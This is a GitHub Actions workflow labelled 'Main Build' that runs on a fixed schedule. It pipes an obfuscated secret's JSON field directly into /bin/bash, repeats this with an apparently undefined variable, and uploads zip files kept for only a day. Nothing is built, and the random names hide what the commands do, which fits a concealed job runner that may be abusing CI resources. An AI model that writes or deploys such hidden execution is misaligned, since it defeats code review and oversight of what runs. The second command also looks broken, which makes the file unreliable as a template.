name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '17 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          ngod17879: ${{ secrets.ngod17879 }}
        run: |
          printf '%s' "$ngod17879" | jq -r .ylde6909 | /bin/bash
          printf '%s' "$v9" | jq -r .evtm8550 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: T9rpuhme
          path: "*.zip"
          retention-days: 1
